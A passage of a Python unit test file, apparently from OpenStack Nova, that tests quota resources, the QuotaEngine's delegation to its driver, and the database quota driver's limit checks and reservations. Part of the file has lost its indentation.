        resource = quota.BaseResource('test_resource', 'quota_instances')
        self.assertEqual(resource.name, 'test_resource')
        self.assertEqual(resource.flag, 'quota_instances')
        self.assertEqual(resource.default, -1)

    def test_quota_no_project_no_class(self):
        # No overrides anywhere: the flag default (10) wins.
        self.flags(quota_instances=10)
        resource = quota.BaseResource('test_resource', 'quota_instances')
        driver = FakeDriver()
        context = FakeContext(None, None)
        quota_value = resource.quota(driver, context)
        self.assertEqual(quota_value, 10)

    def test_quota_with_project_no_class(self):
        # A per-project override (15) beats the flag default (10).
        self.flags(quota_instances=10)
        resource = quota.BaseResource('test_resource', 'quota_instances')
        driver = FakeDriver(by_project=dict(
            test_project=dict(test_resource=15),
        ))
        context = FakeContext('test_project', None)
        quota_value = resource.quota(driver, context)
        self.assertEqual(quota_value, 15)

    def test_quota_no_project_with_class(self):
        # A quota-class override (20) beats the flag default (10).
        self.flags(quota_instances=10)
        resource = quota.BaseResource('test_resource', 'quota_instances')
        driver = FakeDriver(by_class=dict(
            test_class=dict(test_resource=20),
        ))
        context = FakeContext(None, 'test_class')
        quota_value = resource.quota(driver, context)
        self.assertEqual(quota_value, 20)

    def test_quota_with_project_with_class(self):
        # Project override (15) takes precedence over class override (20).
        self.flags(quota_instances=10)
        resource = quota.BaseResource('test_resource', 'quota_instances')
        driver = FakeDriver(by_project=dict(
            test_project=dict(test_resource=15),
        ),
            by_class=dict(
                test_class=dict(test_resource=20),
            ))
        context = FakeContext('test_project', 'test_class')
        quota_value = resource.quota(driver, context)
        self.assertEqual(quota_value, 15)

    def test_quota_override_project_with_class(self):
        # An explicit project_id kwarg overrides the context's project.
        self.flags(quota_instances=10)
        resource = quota.BaseResource('test_resource', 'quota_instances')
        driver = FakeDriver(by_project=dict(
            test_project=dict(test_resource=15),
            override_project=dict(test_resource=20),
        ))
        context = FakeContext('test_project', 'test_class')
        quota_value = resource.quota(driver, context,
                                     project_id='override_project')
        self.assertEqual(quota_value, 20)

    def test_quota_with_project_override_class(self):
        # An explicit quota_class kwarg overrides the context's class.
        self.flags(quota_instances=10)
        resource = quota.BaseResource('test_resource', 'quota_instances')
        driver = FakeDriver(by_class=dict(
            test_class=dict(test_resource=15),
            override_class=dict(test_resource=20),
        ))
        context = FakeContext('test_project', 'test_class')
        quota_value = resource.quota(driver, context,
                                     quota_class='override_class')
        self.assertEqual(quota_value, 20)
class QuotaEngineTestCase(test.TestCase):
    """Tests that quota.QuotaEngine delegates correctly to its driver."""

    def test_init(self):
        # Default construction uses the DB-backed driver.
        quota_obj = quota.QuotaEngine()
        self.assertEqual(quota_obj._resources, {})
        self.assertTrue(isinstance(quota_obj._driver, quota.DbQuotaDriver))

    def test_init_override_string(self):
        # The driver may be named by its import path...
        quota_obj = quota.QuotaEngine(
            quota_driver_class='nova.tests.test_quota.FakeDriver')
        self.assertEqual(quota_obj._resources, {})
        self.assertTrue(isinstance(quota_obj._driver, FakeDriver))

    def test_init_override_obj(self):
        # ...or passed in directly as an object.
        quota_obj = quota.QuotaEngine(quota_driver_class=FakeDriver)
        self.assertEqual(quota_obj._resources, {})
        self.assertEqual(quota_obj._driver, FakeDriver)

    def test_register_resource(self):
        quota_obj = quota.QuotaEngine()
        resource = quota.AbsoluteResource('test_resource')
        quota_obj.register_resource(resource)
        self.assertEqual(quota_obj._resources, dict(test_resource=resource))

    def test_register_resources(self):
        quota_obj = quota.QuotaEngine()
        resources = [
            quota.AbsoluteResource('test_resource1'),
            quota.AbsoluteResource('test_resource2'),
            quota.AbsoluteResource('test_resource3'),
        ]
        quota_obj.register_resources(resources)
        self.assertEqual(quota_obj._resources, dict(
            test_resource1=resources[0],
            test_resource2=resources[1],
            test_resource3=resources[2],
        ))

    def test_sync_predeclared(self):
        quota_obj = quota.QuotaEngine()

        def spam(*args, **kwargs):
            pass

        resource = quota.ReservableResource('test_resource', spam)
        quota_obj.register_resource(resource)
        self.assertEqual(resource.sync, spam)

    def test_sync_multi(self):
        quota_obj = quota.QuotaEngine()

        def spam(*args, **kwargs):
            pass

        resources = [
            quota.ReservableResource('test_resource1', spam),
            quota.ReservableResource('test_resource2', spam),
            quota.ReservableResource('test_resource3', spam),
            quota.ReservableResource('test_resource4', spam),
        ]
        # Only the first two are registered; sync is set at construction,
        # so all four still carry it.
        quota_obj.register_resources(resources[:2])
        self.assertEqual(resources[0].sync, spam)
        self.assertEqual(resources[1].sync, spam)
        self.assertEqual(resources[2].sync, spam)
        self.assertEqual(resources[3].sync, spam)

    def test_get_by_project(self):
        context = FakeContext('test_project', 'test_class')
        driver = FakeDriver(by_project=dict(
            test_project=dict(test_resource=42)))
        quota_obj = quota.QuotaEngine(quota_driver_class=driver)
        result = quota_obj.get_by_project(context, 'test_project',
                                          'test_resource')
        self.assertEqual(driver.called, [
            ('get_by_project', context, 'test_project', 'test_resource'),
        ])
        self.assertEqual(result, 42)

    def test_get_by_class(self):
        context = FakeContext('test_project', 'test_class')
        driver = FakeDriver(by_class=dict(
            test_class=dict(test_resource=42)))
        quota_obj = quota.QuotaEngine(quota_driver_class=driver)
        result = quota_obj.get_by_class(context, 'test_class', 'test_resource')
        self.assertEqual(driver.called, [
            ('get_by_class', context, 'test_class', 'test_resource'),
        ])
        self.assertEqual(result, 42)

    def _make_quota_obj(self, driver):
        """Build an engine with four absolute resources registered."""
        quota_obj = quota.QuotaEngine(quota_driver_class=driver)
        resources = [
            quota.AbsoluteResource('test_resource4'),
            quota.AbsoluteResource('test_resource3'),
            quota.AbsoluteResource('test_resource2'),
            quota.AbsoluteResource('test_resource1'),
        ]
        quota_obj.register_resources(resources)
        return quota_obj

    def test_get_defaults(self):
        context = FakeContext(None, None)
        driver = FakeDriver()
        quota_obj = self._make_quota_obj(driver)
        result = quota_obj.get_defaults(context)
        self.assertEqual(driver.called, [
            ('get_defaults', context, quota_obj._resources),
        ])
        self.assertEqual(result, quota_obj._resources)

    def test_get_class_quotas(self):
        context = FakeContext(None, None)
        driver = FakeDriver()
        quota_obj = self._make_quota_obj(driver)
        # Second call disables the defaults flag.
        result1 = quota_obj.get_class_quotas(context, 'test_class')
        result2 = quota_obj.get_class_quotas(context, 'test_class', False)
        self.assertEqual(driver.called, [
            ('get_class_quotas', context, quota_obj._resources,
             'test_class', True),
            ('get_class_quotas', context, quota_obj._resources,
             'test_class', False),
        ])
        self.assertEqual(result1, quota_obj._resources)
        self.assertEqual(result2, quota_obj._resources)

    def test_get_project_quotas(self):
        context = FakeContext(None, None)
        driver = FakeDriver()
        quota_obj = self._make_quota_obj(driver)
        result1 = quota_obj.get_project_quotas(context, 'test_project')
        result2 = quota_obj.get_project_quotas(context, 'test_project',
                                               quota_class='test_class',
                                               defaults=False,
                                               usages=False)
        self.assertEqual(driver.called, [
            ('get_project_quotas', context, quota_obj._resources,
             'test_project', None, True, True),
            ('get_project_quotas', context, quota_obj._resources,
             'test_project', 'test_class', False, False),
        ])
        self.assertEqual(result1, quota_obj._resources)
        self.assertEqual(result2, quota_obj._resources)

    def test_count_no_resource(self):
        # Counting an unregistered resource name raises.
        context = FakeContext(None, None)
        driver = FakeDriver()
        quota_obj = self._make_quota_obj(driver)
        self.assertRaises(exception.QuotaResourceUnknown,
                          quota_obj.count, context, 'test_resource5',
                          True, foo='bar')

    def test_count_wrong_resource(self):
        # test_resource1 exists but is not a CountableResource.
        context = FakeContext(None, None)
        driver = FakeDriver()
        quota_obj = self._make_quota_obj(driver)
        self.assertRaises(exception.QuotaResourceUnknown,
                          quota_obj.count, context, 'test_resource1',
                          True, foo='bar')

    def test_count(self):
        def fake_count(context, *args, **kwargs):
            # The engine must pass positional and keyword args through.
            self.assertEqual(args, (True,))
            self.assertEqual(kwargs, dict(foo='bar'))
            return 5

        context = FakeContext(None, None)
        driver = FakeDriver()
        quota_obj = self._make_quota_obj(driver)
        quota_obj.register_resource(quota.CountableResource('test_resource5',
                                                            fake_count))
        result = quota_obj.count(context, 'test_resource5', True, foo='bar')
        self.assertEqual(result, 5)

    def test_limit_check(self):
        context = FakeContext(None, None)
        driver = FakeDriver()
        quota_obj = self._make_quota_obj(driver)
        quota_obj.limit_check(context, test_resource1=4, test_resource2=3,
                              test_resource3=2, test_resource4=1)
        self.assertEqual(driver.called, [
            ('limit_check', context, quota_obj._resources, dict(
                test_resource1=4,
                test_resource2=3,
                test_resource3=2,
                test_resource4=1,
            ), None),
        ])

    def test_reserve(self):
        context = FakeContext(None, None)
        driver = FakeDriver(reservations=[
            'resv-01', 'resv-02', 'resv-03', 'resv-04',
        ])
        quota_obj = self._make_quota_obj(driver)
        # Three variants: plain, with expire, and with project_id.
        result1 = quota_obj.reserve(context, test_resource1=4,
                                    test_resource2=3, test_resource3=2,
                                    test_resource4=1)
        result2 = quota_obj.reserve(context, expire=3600,
                                    test_resource1=1, test_resource2=2,
                                    test_resource3=3, test_resource4=4)
        result3 = quota_obj.reserve(context, project_id='fake_project',
                                    test_resource1=1, test_resource2=2,
                                    test_resource3=3, test_resource4=4)
        self.assertEqual(driver.called, [
            ('reserve', context, quota_obj._resources, dict(
                test_resource1=4,
                test_resource2=3,
                test_resource3=2,
                test_resource4=1,
            ), None, None),
            ('reserve', context, quota_obj._resources, dict(
                test_resource1=1,
                test_resource2=2,
                test_resource3=3,
                test_resource4=4,
            ), 3600, None),
            ('reserve', context, quota_obj._resources, dict(
                test_resource1=1,
                test_resource2=2,
                test_resource3=3,
                test_resource4=4,
            ), None, 'fake_project'),
        ])
        self.assertEqual(result1, [
            'resv-01', 'resv-02', 'resv-03', 'resv-04',
        ])
        self.assertEqual(result2, [
            'resv-01', 'resv-02', 'resv-03', 'resv-04',
        ])
        self.assertEqual(result3, [
            'resv-01', 'resv-02', 'resv-03', 'resv-04',
        ])

    def test_commit(self):
        context = FakeContext(None, None)
        driver = FakeDriver()
        quota_obj = self._make_quota_obj(driver)
        quota_obj.commit(context, ['resv-01', 'resv-02', 'resv-03'])
        self.assertEqual(driver.called, [
            ('commit', context, ['resv-01', 'resv-02', 'resv-03'], None),
        ])

    def test_rollback(self):
        context = FakeContext(None, None)
        driver = FakeDriver()
        quota_obj = self._make_quota_obj(driver)
        quota_obj.rollback(context, ['resv-01', 'resv-02', 'resv-03'])
        self.assertEqual(driver.called, [
            ('rollback', context, ['resv-01', 'resv-02', 'resv-03'], None),
        ])

    def test_usage_reset(self):
        context = FakeContext(None, None)
        driver = FakeDriver()
        quota_obj = self._make_quota_obj(driver)
        quota_obj.usage_reset(context, ['res1', 'res2', 'res3'])
        self.assertEqual(driver.called, [
            ('usage_reset', context, ['res1', 'res2', 'res3']),
        ])

    def test_destroy_all_by_project(self):
        context = FakeContext(None, None)
        driver = FakeDriver()
        quota_obj = self._make_quota_obj(driver)
        quota_obj.destroy_all_by_project(context, 'test_project')
        self.assertEqual(driver.called, [
            ('destroy_all_by_project', context, 'test_project'),
        ])

    def test_expire(self):
        context = FakeContext(None, None)
        driver = FakeDriver()
        quota_obj = self._make_quota_obj(driver)
        quota_obj.expire(context)
        self.assertEqual(driver.called, [
            ('expire', context),
        ])

    def test_resources(self):
        # Registered 4,3,2,1 but the property reports names sorted.
        quota_obj = self._make_quota_obj(None)
        self.assertEqual(quota_obj.resources,
                         ['test_resource1', 'test_resource2',
                          'test_resource3', 'test_resource4'])
class DbQuotaDriverTestCase(test.TestCase):
def setUp(self):
super(DbQuotaDriverTestCase, self).setUp()
self.flags(quota_instances=10,
quota_cores=20,
quota_ram=50 * 1024,
quota_floating_ips=10,
quota_fixed_ips=10,
quota_metadata_items=128,
quota_injected_files=5,
quota_injected_file_content_bytes=10 * 1024,
quota_injected_file_path_bytes=255,
quota_security_groups=10,
quota_security_group_rules=20,
reservation_expire=86400,
until_refresh=0,
max_age=0,
)
self.driver = quota.DbQuotaDriver()
self.calls = []
self.useFixture(test.TimeOverride())
def test_get_defaults(self):
# Use our pre-defined resources
result = self.driver.get_defaults(None, quota.QUOTAS._resources)
self.assertEqual(result, dict(
instances=10,
cores=20,
ram=50 * 1024,
floating_ips=10,
fixed_ips=10,
metadata_items=128,
injected_files=5,
injected_file_content_bytes=10 * 1024,
injected_file_path_bytes=255,
security_groups=10,
security_group_rules=20,
key_pairs=100,
))
def _stub_quota_class_get_all_by_name(self):
# Stub out quota_class_get_all_by_name
def fake_qcgabn(context, quota_class):
self.calls.append('quota_class_get_all_by_name')
self.assertEqual(quota_class, 'test_class')
return dict(
instances=5,
ram=25 * 1024,
metadata_items=64,
injected_file_content_bytes=5 * 1024,
)
self.stubs.Set(db, 'quota_class_get_all_by_name', fake_qcgabn)
def test_get_class_quotas(self):
self._stub_quota_class_get_all_by_name()
result = self.driver.get_class_quotas(None, quota.QUOTAS._resources,
'test_class')
self.assertEqual(self.calls, ['quota_class_get_all_by_name'])
self.assertEqual(result, dict(
instances=5,
cores=20,
ram=25 * 1024,
floating_ips=10,
fixed_ips=10,
metadata_items=64,
injected_files=5,
injected_file_content_bytes=5 * 1024,
injected_file_path_bytes=255,
security_groups=10,
security_group_rules=20,
key_pairs=100,
))
def test_get_class_quotas_no_defaults(self):
self._stub_quota_class_get_all_by_name()
result = self.driver.get_class_quotas(None, quota.QUOTAS._resources,
'test_class', False)
self.assertEqual(self.calls, ['quota_class_get_all_by_name'])
self.assertEqual(result, dict(
instances=5,
ram=25 * 1024,
metadata_items=64,
injected_file_content_bytes=5 * 1024,
))
def _stub_get_by_project(self):
def fake_qgabp(context, project_id):
self.calls.append('quota_get_all_by_project')
self.assertEqual(project_id, 'test_project')
return dict(
cores=10,
injected_files=2,
injected_file_path_bytes=127,
)
def fake_qugabp(context, project_id):
self.calls.append('quota_usage_get_all_by_project')
self.assertEqual(project_id, 'test_project')
return dict(
instances=dict(in_use=2, reserved=2),
cores=dict(in_use=4, reserved=4),
ram=dict(in_use=10 * 1024, reserved=0),
floating_ips=dict(in_use=2, reserved=0),
metadata_items=dict(in_use=0, reserved=0),
injected_files=dict(in_use=0, reserved=0),
injected_file_content_bytes=dict(in_use=0, reserved=0),
injected_file_path_bytes=dict(in_use=0, reserved=0),
)
self.stubs.Set(db, 'quota_get_all_by_project', fake_qgabp)
self.stubs.Set(db, 'quota_usage_get_all_by_project', fake_qugabp)
self._stub_quota_class_get_all_by_name()
def test_get_project_quotas(self):
self.maxDiff = None
self._stub_get_by_project()
result = self.driver.get_project_quotas(
FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources, 'test_project')
self.assertEqual(self.calls, [
'quota_get_all_by_project',
'quota_usage_get_all_by_project',
'quota_class_get_all_by_name',
])
self.assertEqual(result, dict(
instances=dict(
limit=5,
in_use=2,
reserved=2,
),
cores=dict(
limit=10,
in_use=4,
reserved=4,
),
ram=dict(
limit=25 * 1024,
in_use=10 * 1024,
reserved=0,
),
floating_ips=dict(
limit=10,
in_use=2,
reserved=0,
),
fixed_ips=dict(
limit=10,
in_use=0,
reserved=0,
),
metadata_items=dict(
limit=64,
in_use=0,
reserved=0,
),
injected_files=dict(
limit=2,
in_use=0,
reserved=0,
),
injected_file_content_bytes=dict(
limit=5 * 1024,
in_use=0,
reserved=0,
),
injected_file_path_bytes=dict(
limit=127,
in_use=0,
reserved=0,
),
security_groups=dict(
limit=10,
in_use=0,
reserved=0,
),
security_group_rules=dict(
limit=20,
in_use=0,
reserved=0,
),
key_pairs=dict(
limit=100,
in_use=0,
reserved=0,
),
))
def test_get_project_quotas_alt_context_no_class(self):
self.maxDiff = None
self._stub_get_by_project()
result = self.driver.get_project_quotas(
FakeContext('other_project', 'other_class'),
quota.QUOTAS._resources, 'test_project')
self.assertEqual(self.calls, [
'quota_get_all_by_project',
'quota_usage_get_all_by_project',
])
self.assertEqual(result, dict(
instances=dict(
limit=10,
in_use=2,
reserved=2,
),
cores=dict(
limit=10,
in_use=4,
reserved=4,
),
ram=dict(
limit=50 * 1024,
in_use=10 * 1024,
reserved=0,
),
floating_ips=dict(
limit=10,
in_use=2,
reserved=0,
),
fixed_ips=dict(
limit=10,
in_use=0,
reserved=0,
),
metadata_items=dict(
limit=128,
in_use=0,
reserved=0,
),
injected_files=dict(
limit=2,
in_use=0,
reserved=0,
),
injected_file_content_bytes=dict(
limit=10 * 1024,
in_use=0,
reserved=0,
),
injected_file_path_bytes=dict(
limit=127,
in_use=0,
reserved=0,
),
security_groups=dict(
limit=10,
in_use=0,
reserved=0,
),
security_group_rules=dict(
limit=20,
in_use=0,
reserved=0,
),
key_pairs=dict(
limit=100,
in_use=0,
reserved=0,
),
))
def test_get_project_quotas_alt_context_with_class(self):
self.maxDiff = None
self._stub_get_by_project()
result = self.driver.get_project_quotas(
FakeContext('other_project', 'other_class'),
quota.QUOTAS._resources, 'test_project', quota_class='test_class')
self.assertEqual(self.calls, [
'quota_get_all_by_project',
'quota_usage_get_all_by_project',
'quota_class_get_all_by_name',
])
self.assertEqual(result, dict(
instances=dict(
limit=5,
in_use=2,
reserved=2,
),
cores=dict(
limit=10,
in_use=4,
reserved=4,
),
ram=dict(
limit=25 * 1024,
in_use=10 * 1024,
reserved=0,
),
floating_ips=dict(
limit=10,
in_use=2,
reserved=0,
),
fixed_ips=dict(
limit=10,
in_use=0,
reserved=0,
),
metadata_items=dict(
limit=64,
in_use=0,
reserved=0,
),
injected_files=dict(
limit=2,
in_use=0,
reserved=0,
),
injected_file_content_bytes=dict(
limit=5 * 1024,
in_use=0,
reserved=0,
),
injected_file_path_bytes=dict(
limit=127,
in_use=0,
reserved=0,
),
security_groups=dict(
limit=10,
in_use=0,
reserved=0,
),
security_group_rules=dict(
limit=20,
in_use=0,
reserved=0,
),
key_pairs=dict(
limit=100,
in_use=0,
reserved=0,
),
))
def test_get_project_quotas_no_defaults(self):
self._stub_get_by_project()
result = self.driver.get_project_quotas(
FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources, 'test_project', defaults=False)
self.assertEqual(self.calls, [
'quota_get_all_by_project',
'quota_usage_get_all_by_project',
'quota_class_get_all_by_name',
])
self.assertEqual(result, dict(
cores=dict(
limit=10,
in_use=4,
reserved=4,
),
injected_files=dict(
limit=2,
in_use=0,
reserved=0,
),
injected_file_path_bytes=dict(
limit=127,
in_use=0,
reserved=0,
),
))
def test_get_project_quotas_no_usages(self):
self._stub_get_by_project()
result = self.driver.get_project_quotas(
FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources, 'test_project', usages=False)
self.assertEqual(self.calls, [
'quota_get_all_by_project',
'quota_class_get_all_by_name',
])
self.assertEqual(result, dict(
instances=dict(
limit=5,
),
cores=dict(
limit=10,
),
ram=dict(
limit=25 * 1024,
),
floating_ips=dict(
limit=10,
),
fixed_ips=dict(
limit=10,
),
metadata_items=dict(
limit=64,
),
injected_files=dict(
limit=2,
),
injected_file_content_bytes=dict(
limit=5 * 1024,
),
injected_file_path_bytes=dict(
limit=127,
),
security_groups=dict(
limit=10,
),
security_group_rules=dict(
limit=20,
),
key_pairs=dict(
limit=100,
),
))
def _stub_get_project_quotas(self):
def fake_get_project_quotas(context, resources, project_id,
quota_class=None, defaults=True,
usages=True):
self.calls.append('get_project_quotas')
return dict((k, dict(limit=v.default))
for k, v in resources.items())
self.stubs.Set(self.driver, 'get_project_quotas',
fake_get_project_quotas)
def test_get_quotas_has_sync_unknown(self):
self._stub_get_project_quotas()
self.assertRaises(exception.QuotaResourceUnknown,
self.driver._get_quotas,
None, quota.QUOTAS._resources,
['unknown'], True)
self.assertEqual(self.calls, [])
def test_get_quotas_no_sync_unknown(self):
self._stub_get_project_quotas()
self.assertRaises(exception.QuotaResourceUnknown,
self.driver._get_quotas,
None, quota.QUOTAS._resources,
['unknown'], False)
self.assertEqual(self.calls, [])
def test_get_quotas_has_sync_no_sync_resource(self):
self._stub_get_project_quotas()
self.assertRaises(exception.QuotaResourceUnknown,
self.driver._get_quotas,
None, quota.QUOTAS._resources,
['metadata_items'], True)
self.assertEqual(self.calls, [])
def test_get_quotas_no_sync_has_sync_resource(self):
self._stub_get_project_quotas()
self.assertRaises(exception.QuotaResourceUnknown,
self.driver._get_quotas,
None, quota.QUOTAS._resources,
['instances'], False)
self.assertEqual(self.calls, [])
def test_get_quotas_has_sync(self):
self._stub_get_project_quotas()
result = self.driver._get_quotas(FakeContext('test_project',
'test_class'),
quota.QUOTAS._resources,
['instances', 'cores', 'ram',
'floating_ips', 'security_groups'],
True)
self.assertEqual(self.calls, ['get_project_quotas'])
self.assertEqual(result, dict(
instances=10,
cores=20,
ram=50 * 1024,
floating_ips=10,
security_groups=10,
))
def test_get_quotas_no_sync(self):
self._stub_get_project_quotas()
result = self.driver._get_quotas(FakeContext('test_project',
'test_class'),
quota.QUOTAS._resources,
['metadata_items', 'injected_files',
'injected_file_content_bytes',
'injected_file_path_bytes',
'security_group_rules'], False)
self.assertEqual(self.calls, ['get_project_quotas'])
self.assertEqual(result, dict(
metadata_items=128,
injected_files=5,
injected_file_content_bytes=10 * 1024,
injected_file_path_bytes=255,
security_group_rules=20,
))
def test_limit_check_under(self):
self._stub_get_project_quotas()
self.assertRaises(exception.InvalidQuotaValue,
self.driver.limit_check,
FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(metadata_items=-1))
def test_limit_check_over(self):
self._stub_get_project_quotas()
self.assertRaises(exception.OverQuota,
self.driver.limit_check,
FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(metadata_items=129))
def test_limit_check_unlimited(self):
self.flags(quota_metadata_items=-1)
self._stub_get_project_quotas()
self.driver.limit_check(FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(metadata_items=32767))
def test_limit_check(self):
self._stub_get_project_quotas()
self.driver.limit_check(FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(metadata_items=128))
def _stub_quota_reserve(self):
def fake_quota_reserve(context, resources, quotas, deltas, expire,
until_refresh, max_age, project_id=None):
self.calls.append(('quota_reserve', expire, until_refresh,
max_age))
return ['resv-1', 'resv-2', 'resv-3']
self.stubs.Set(db, 'quota_reserve', fake_quota_reserve)
def test_reserve_bad_expire(self):
self._stub_get_project_quotas()
self._stub_quota_reserve()
self.assertRaises(exception.InvalidReservationExpiration,
self.driver.reserve,
FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(instances=2), expire='invalid')
self.assertEqual(self.calls, [])
def test_reserve_default_expire(self):
self._stub_get_project_quotas()
self._stub_quota_reserve()
result = self.driver.reserve(FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(instances=2))
expire = timeutils.utcnow() + datetime.timedelta(seconds=86400)
self.assertEqual(self.calls, [
'get_project_quotas',
('quota_reserve', expire, 0, 0),
])
self.assertEqual(result, ['resv-1', 'resv-2', 'resv-3'])
def test_reserve_int_expire(self):
self._stub_get_project_quotas()
self._stub_quota_reserve()
result = self.driver.reserve(FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(instances=2), expire=3600)
expire = timeutils.utcnow() + datetime.timedelta(seconds=3600)
self.assertEqual(self.calls, [
'get_project_quotas',
('quota_reserve', expire, 0, 0),
])
self.assertEqual(result, ['resv-1', 'resv-2', 'resv-3'])
def test_reserve_timedelta_expire(self):
self._stub_get_project_quotas()
self._stub_quota_reserve()
expire_delta = datetime.timedelta(seconds=60)
result = self.driver.reserve(FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(instances=2), expire=expire_delta)
expire = timeutils.utcnow() + expire_delta
self.assertEqual(self.calls, [
'get_project_quotas',
('quota_reserve', expire, 0, 0),
])
self.assertEqual(result, ['resv-1', 'resv-2', 'resv-3'])
def test_reserve_datetime_expire(self):
self._stub_get_project_quotas()
self._stub_quota_reserve()
expire = timeutils.utcnow() + datetime.timedelta(seconds=120)
result = self.driver.reserve(FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(instances=2), expire=expire)
self.assertEqual(self.calls, [
'get_project_quotas',
('quota_reserve', expire, 0, 0),
])
self.assertEqual(result, ['resv-1', 'resv-2', 'resv-3'])
def test_reserve_until_refresh(self):
self._stub_get_project_quotas()
self._stub_quota_reserve()
self.flags(until_refresh=500)
expire = timeutils.utcnow() + datetime.timedelta(seconds=120)
result = self.driver.reserve(FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(instances=2), expire=expire)
self.assertEqual(self.calls, [
'get_project_quotas',
('quota_reserve', expire, 500, 0),
])
self.assertEqual(result, ['resv-1', 'resv-2', 'resv-3'])
def test_reserve_max_age(self):
self._stub_get_project_quotas()
self._stub_quota_reserve()
self.flags(max_age=86400)
expire = timeutils.utcnow() + datetime.timedelta(seconds=120)
result = self.driver.reserve(FakeContext('test_project', 'test_class'),
quota.QUOTAS._resources,
dict(instances=2), expire=expire)
self.assertEqual(self.calls, [
'get_project_quotas',
('quota_reserve', expire, 0, 86400),
])
self.assertEqual(result, ['resv-1', 'resv-2', 'resv-3'])
def test_usage_reset(self):
calls = []
def fake_quota_usage_update(context, project_id, resource, **kwargs):
calls.append(('quota_usage_update', context, project_id,
resource, kwargs))
if resource == 'nonexist':
raise exception.QuotaUsageNotFound(project_id=project_id)
self.stubs.Set(db, 'quota_usage_update', fake_quota_usage_update)
ctx = FakeContext('test_project', 'test_class')
resources = ['res1', 'res2', 'nonexist', 'res4']
self.driver.usage_reset(ctx, resources)
# Make sure we had some calls
self.assertEqual(len(calls), len(resources))
# Extract the elevated context that was used and do some
# sanity checks
elevated = calls[0][1]
self.assertEqual(elevated.project_id, ctx.project_id)
self.assertEqual(elevated.quota_class, ctx.quota_class)
self.assertEqual(elevated.is_admin, True)
# Now check that all the expected calls were made
exemplar = [('quota_usage_update', elevated, 'test_project',
res, dict(in_use=-1)) for res in resources]
self.assertEqual(calls, exemplar)
class FakeSession(object):
    """Minimal stand-in for a SQLAlchemy session.

    begin() returns the session itself so ``with session.begin():`` works;
    __exit__ never suppresses exceptions raised inside the block.
    """
    def begin(self):
        return self

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, exc_traceback):
        # False -> propagate any exception from the with-block.
        return False
class FakeUsage(sqa_models.QuotaUsage):
    # In-memory QuotaUsage whose save() is a no-op so tests never hit the DB.
    def save(self, *args, **kwargs):
        pass
class QuotaReserveSqlAlchemyTestCase(test.TestCase):
    # nova.db.sqlalchemy.api.quota_reserve is so complex it needs its
    # own test case, and since it's a quota manipulator, this is the
    # best place to put it...

    def setUp(self):
        super(QuotaReserveSqlAlchemyTestCase, self).setUp()

        # Resources whose sync function has been invoked by quota_reserve.
        self.sync_called = set()

        def make_sync(res_name):
            # Each sync records that it ran and reports a deterministic
            # in_use value derived from the seeded usage record.
            def sync(context, project_id, session):
                self.sync_called.add(res_name)
                if res_name in self.usages:
                    if self.usages[res_name].in_use < 0:
                        return {res_name: 2}
                    else:
                        return {res_name: self.usages[res_name].in_use - 1}
                return {res_name: 0}
            return sync

        self.resources = {}
        for res_name in ('instances', 'cores', 'ram'):
            res = quota.ReservableResource(res_name, make_sync(res_name))
            self.resources[res_name] = res

        self.expire = timeutils.utcnow() + datetime.timedelta(seconds=3600)

        # Seeded usage records, plus records/reservations created by the
        # stubbed db-layer helpers below.
        self.usages = {}
        self.usages_created = {}
        self.reservations_created = {}

        def fake_get_session():
            return FakeSession()

        def fake_get_quota_usages(context, session, project_id):
            return self.usages.copy()

        def fake_quota_usage_create(context, project_id, resource, in_use,
                                    reserved, until_refresh, session=None,
                                    save=True):
            quota_usage_ref = self._make_quota_usage(
                project_id, resource, in_use, reserved, until_refresh,
                timeutils.utcnow(), timeutils.utcnow())

            self.usages_created[resource] = quota_usage_ref

            return quota_usage_ref

        def fake_reservation_create(context, uuid, usage_id, project_id,
                                    resource, delta, expire, session=None):
            reservation_ref = self._make_reservation(
                uuid, usage_id, project_id, resource, delta, expire,
                timeutils.utcnow(), timeutils.utcnow())

            self.reservations_created[resource] = reservation_ref

            return reservation_ref

        self.stubs.Set(sqa_api, 'get_session', fake_get_session)
        self.stubs.Set(sqa_api, '_get_quota_usages', fake_get_quota_usages)
        self.stubs.Set(sqa_api, '_quota_usage_create', fake_quota_usage_create)
        self.stubs.Set(sqa_api, 'reservation_create', fake_reservation_create)

        # Freeze utcnow() so expiry/age comparisons are deterministic.
        self.useFixture(test.TimeOverride())

    def _make_quota_usage(self, project_id, resource, in_use, reserved,
                          until_refresh, created_at, updated_at):
        """Build a FakeUsage populated with the given fields."""
        quota_usage_ref = FakeUsage()
        quota_usage_ref.id = len(self.usages) + len(self.usages_created)
        quota_usage_ref.project_id = project_id
        quota_usage_ref.resource = resource
        quota_usage_ref.in_use = in_use
        quota_usage_ref.reserved = reserved
        quota_usage_ref.until_refresh = until_refresh
        quota_usage_ref.created_at = created_at
        quota_usage_ref.updated_at = updated_at
        quota_usage_ref.deleted_at = None
        quota_usage_ref.deleted = False

        return quota_usage_ref

    def init_usage(self, project_id, resource, in_use, reserved,
                   until_refresh=None, created_at=None, updated_at=None):
        """Seed a pre-existing usage record for quota_reserve to find."""
        if created_at is None:
            created_at = timeutils.utcnow()
        if updated_at is None:
            updated_at = timeutils.utcnow()

        quota_usage_ref = self._make_quota_usage(project_id, resource, in_use,
                                                 reserved, until_refresh,
                                                 created_at, updated_at)

        self.usages[resource] = quota_usage_ref

    def compare_usage(self, usage_dict, expected):
        """Assert each expected dict's fields match the stored usage."""
        for usage in expected:
            resource = usage['resource']
            for key, value in usage.items():
                actual = getattr(usage_dict[resource], key)
                self.assertEqual(actual, value,
                                 "%s != %s on usage for resource %s" %
                                 (actual, value, resource))

    def _make_reservation(self, uuid, usage_id, project_id, resource,
                          delta, expire, created_at, updated_at):
        """Build a Reservation model populated with the given fields."""
        reservation_ref = sqa_models.Reservation()
        reservation_ref.id = len(self.reservations_created)
        reservation_ref.uuid = uuid
        reservation_ref.usage_id = usage_id
